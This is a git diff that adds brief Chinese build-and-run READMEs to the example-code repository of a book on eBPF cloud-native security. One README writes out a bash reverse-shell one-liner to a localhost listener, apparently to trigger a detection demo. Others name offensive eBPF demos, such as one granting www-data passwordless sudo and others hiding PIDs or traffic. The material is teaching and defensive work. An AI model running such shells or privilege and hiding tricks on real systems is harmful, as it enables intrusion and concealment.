diff --git a/README.md b/README.md
index 9ed1de0..e1f4316 100644
--- a/README.md
+++ b/README.md
@@ -1,6 +1,8 @@ # eBPF 云原生安全:原理与实践 eBPF 云原生安全:原理与实践 +![GitHub Actions Workflow Status](https://img.shields.io/github/actions/workflow/status/mozillazg/cloud-native-security-with-ebpf/build.yml?label=build%20programs&link=https%3A%2F%2Fgithub.com%2Fmozillazg%2Fcloud-native-security-with-ebpf%2Factions%2Fworkflows%2Fbuild.yml) + 《eBPF 云原生安全:原理与实践》书中示例程序的完整源代码。
@@ -8,7 +10,7 @@ ## 链接 - +* 豆瓣: * 天猫: * 京东:
diff --git a/chapter11/socket-filter-userspace-parse/README.md b/chapter11/socket-filter-userspace-parse/README.md
new file mode 100644
index 0000000..ebad2f5
--- /dev/null
+++ b/chapter11/socket-filter-userspace-parse/README.md
@@ -0,0 +1,20 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行 ``ping 1.1.1.1 -c 2`` 。
+
+
+
+P.S. main.bpf.c 中有类似的 tcp 版本。
+
diff --git a/chapter11/socket-filter/README.md b/chapter11/socket-filter/README.md
new file mode 100644
index 0000000..ebad2f5
--- /dev/null
+++ b/chapter11/socket-filter/README.md
@@ -0,0 +1,20 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行 ``ping 1.1.1.1 -c 2`` 。
+
+
+
+P.S. main.bpf.c 中有类似的 tcp 版本。
+
diff --git a/chapter11/tc-block/README.md b/chapter11/tc-block/README.md
new file mode 100644
index 0000000..3533d54
--- /dev/null
+++ b/chapter11/tc-block/README.md
@@ -0,0 +1,19 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+sudo ./main <网络接口名称, 默认是 lo>
+sudo ./main
+sudo ./main ens33
+```
+
+
+在另一个终端中执行 ``ping 1.1.1.1 -c 2`` 。
+
+
diff --git a/chapter11/tc-userspace-parse/README.md b/chapter11/tc-userspace-parse/README.md
new file mode 100644
index 0000000..3533d54
--- /dev/null
+++ b/chapter11/tc-userspace-parse/README.md
@@ -0,0 +1,19 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+sudo ./main <网络接口名称, 默认是 lo>
+sudo ./main
+sudo ./main ens33
+```
+
+
+在另一个终端中执行 ``ping 1.1.1.1 -c 2`` 。
+
+
diff --git a/chapter11/tc/README.md b/chapter11/tc/README.md
new file mode 100644
index 0000000..3533d54
--- /dev/null
+++ b/chapter11/tc/README.md
@@ -0,0 +1,19 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+sudo ./main <网络接口名称, 默认是 lo>
+sudo ./main
+sudo ./main ens33
+```
+
+
+在另一个终端中执行 ``ping 1.1.1.1 -c 2`` 。
+
+
diff --git a/chapter11/xdp-block/README.md b/chapter11/xdp-block/README.md
new file mode 100644
index 0000000..3533d54
--- /dev/null
+++ b/chapter11/xdp-block/README.md
@@ -0,0 +1,19 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+sudo ./main <网络接口名称, 默认是 lo>
+sudo ./main
+sudo ./main ens33
+```
+
+
+在另一个终端中执行 ``ping 1.1.1.1 -c 2`` 。
+
+
diff --git a/chapter11/xdp-userspace-parse/README.md b/chapter11/xdp-userspace-parse/README.md
new file mode 100644
index 0000000..3533d54
--- /dev/null
+++ b/chapter11/xdp-userspace-parse/README.md
@@ -0,0 +1,19 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+sudo ./main <网络接口名称, 默认是 lo>
+sudo ./main
+sudo ./main ens33
+```
+
+
+在另一个终端中执行 ``ping 1.1.1.1 -c 2`` 。
+
+
diff --git a/chapter12/net-context/socket-filter/README.md b/chapter12/net-context/socket-filter/README.md
new file mode 100644
index 0000000..b5073ee
--- /dev/null
+++ b/chapter12/net-context/socket-filter/README.md
@@ -0,0 +1,17 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行 ``ping 1.1.1.1 -c 2`` 。
+
+
diff --git a/chapter12/net-context/tc-exist-process/README.md b/chapter12/net-context/tc-exist-process/README.md
new file mode 100644
index 0000000..02f3bb5
--- /dev/null
+++ b/chapter12/net-context/tc-exist-process/README.md
@@ -0,0 +1,21 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+sudo ./main <网络接口名称, 默认是 lo>
+sudo ./main
+sudo ./main ens33
+```
+
+在另一个终端中执行 ``make cat`` 查看输出。
+
+
+在另一个终端中执行 ``curl baidu.com`` 。
+
+
diff --git a/chapter12/net-context/tc/README.md b/chapter12/net-context/tc/README.md
new file mode 100644
index 0000000..02f3bb5
--- /dev/null
+++ b/chapter12/net-context/tc/README.md
@@ -0,0 +1,21 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+sudo ./main <网络接口名称, 默认是 lo>
+sudo ./main
+sudo ./main ens33
+```
+
+在另一个终端中执行 ``make cat`` 查看输出。
+
+
+在另一个终端中执行 ``curl baidu.com`` 。
+
+
diff --git a/chapter12/net-context/xdp/README.md b/chapter12/net-context/xdp/README.md
new file mode 100644
index 0000000..3533d54
--- /dev/null
+++ b/chapter12/net-context/xdp/README.md
@@ -0,0 +1,19 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+sudo ./main <网络接口名称, 默认是 lo>
+sudo ./main
+sudo ./main ens33
+```
+
+
+在另一个终端中执行 ``ping 1.1.1.1 -c 2`` 。
+
+
diff --git a/chapter12/process-context/README.md b/chapter12/process-context/README.md
new file mode 100644
index 0000000..03985e2
--- /dev/null
+++ b/chapter12/process-context/README.md
@@ -0,0 +1,13 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
diff --git a/chapter13/lsm-bprm_creds_from_file/README.md b/chapter13/lsm-bprm_creds_from_file/README.md
new file mode 100644
index 0000000..d463b83
--- /dev/null
+++ b/chapter13/lsm-bprm_creds_from_file/README.md
@@ -0,0 +1,16 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中进入 ../memfd-create/ 目录下,按照 README 执行程序。
+
diff --git a/chapter13/memfd-create/README.md b/chapter13/memfd-create/README.md
new file mode 100644
index 0000000..5716f96
--- /dev/null
+++ b/chapter13/memfd-create/README.md
@@ -0,0 +1,12 @@
+
+## 编译
+
+```
+make
+```
+
+## 运行
+
+```
+./memfd-create `which cat` README.md
+```
diff --git a/chapter13/reverse-shell/README.md b/chapter13/reverse-shell/README.md
new file mode 100644
index 0000000..396fbad
--- /dev/null
+++ b/chapter13/reverse-shell/README.md
@@ -0,0 +1,21 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行:
+
+```
+nc -l 8233 &
+bash -i >& /dev/tcp/127.0.0.1/8233 0>&1 &
+```
+
diff --git a/chapter14/add-sudo/README.md b/chapter14/add-sudo/README.md
new file mode 100644
index 0000000..6d738fd
--- /dev/null
+++ b/chapter14/add-sudo/README.md
@@ -0,0 +1,30 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+
+1. 在另一个终端中执行
+
+```
+sudo -u www-data sudo id
+```
+此时会提示需要输入密码。
+
+2. 执行
+
+```
+make run
+```
+
+3. 在另一个终端中再次执行
+
+```
+sudo -u www-data sudo id
+```
+此时不再需要输入密码。
+
diff --git a/chapter14/check-helper-call/README.md b/chapter14/check-helper-call/README.md
new file mode 100644
index 0000000..5f9ee47
--- /dev/null
+++ b/chapter14/check-helper-call/README.md
@@ -0,0 +1,19 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行一个 ebpf 程序,比如执行 ../add-sudo 目录下的程序。
+
+
+在另一个终端中执行一个 ``make cat`` 查看输出。
+
diff --git a/chapter14/execve-hijack/README.md b/chapter14/execve-hijack/README.md
new file mode 100644
index 0000000..aa7f2e4
--- /dev/null
+++ b/chapter14/execve-hijack/README.md
@@ -0,0 +1,16 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行一些命令。
+
diff --git a/chapter14/hide-incoming-traffic/README.md b/chapter14/hide-incoming-traffic/README.md
new file mode 100644
index 0000000..aa7f2e4
--- /dev/null
+++ b/chapter14/hide-incoming-traffic/README.md
@@ -0,0 +1,16 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行一些命令。
+
diff --git a/chapter14/hide-pid/README.md b/chapter14/hide-pid/README.md
new file mode 100644
index 0000000..aa7f2e4
--- /dev/null
+++ b/chapter14/hide-pid/README.md
@@ -0,0 +1,16 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行一些命令。
+
diff --git a/chapter14/hijack-tcp-to-send-data/README.md b/chapter14/hijack-tcp-to-send-data/README.md
index e69de29..aa7f2e4 100644
--- a/chapter14/hijack-tcp-to-send-data/README.md
+++ b/chapter14/hijack-tcp-to-send-data/README.md
@@ -0,0 +1,16 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行一些命令。
+
diff --git a/chapter14/inspect-ebpf-helpers/README.md b/chapter14/inspect-ebpf-helpers/README.md
new file mode 100644
index 0000000..aa7f2e4
--- /dev/null
+++ b/chapter14/inspect-ebpf-helpers/README.md
@@ -0,0 +1,16 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行一些命令。
+
diff --git a/chapter14/modify-incoming-traffic/README.md b/chapter14/modify-incoming-traffic/README.md
index 19aece1..aa7f2e4 100644
--- a/chapter14/modify-incoming-traffic/README.md
+++ b/chapter14/modify-incoming-traffic/README.md
@@ -1,10 +1,16 @@ +## 编译 -```shell - -curl 127.0.0.1:8080/healthz -v --user-agent 'curl/7.81.0 cmd:test________________' +``` +make build +``` -tcpdump -i lo port 8080 -Xn -s 0 +## 运行 -python3 -m http.server --bind 127.0.0.1 8080 ``` +make run +``` + + +在另一个终端中执行一些命令。 +
diff --git a/chapter14/pipe-hijack/README.md b/chapter14/pipe-hijack/README.md
new file mode 100644
index 0000000..aa7f2e4
--- /dev/null
+++ b/chapter14/pipe-hijack/README.md
@@ -0,0 +1,16 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行一些命令。
+
diff --git a/chapter14/read-file/README.md b/chapter14/read-file/README.md
new file mode 100644
index 0000000..aa7f2e4
--- /dev/null
+++ b/chapter14/read-file/README.md
@@ -0,0 +1,16 @@
+
+## 编译
+
+```
+make build
+```
+
+## 运行
+
+```
+make run
+```
+
+
+在另一个终端中执行一些命令。
+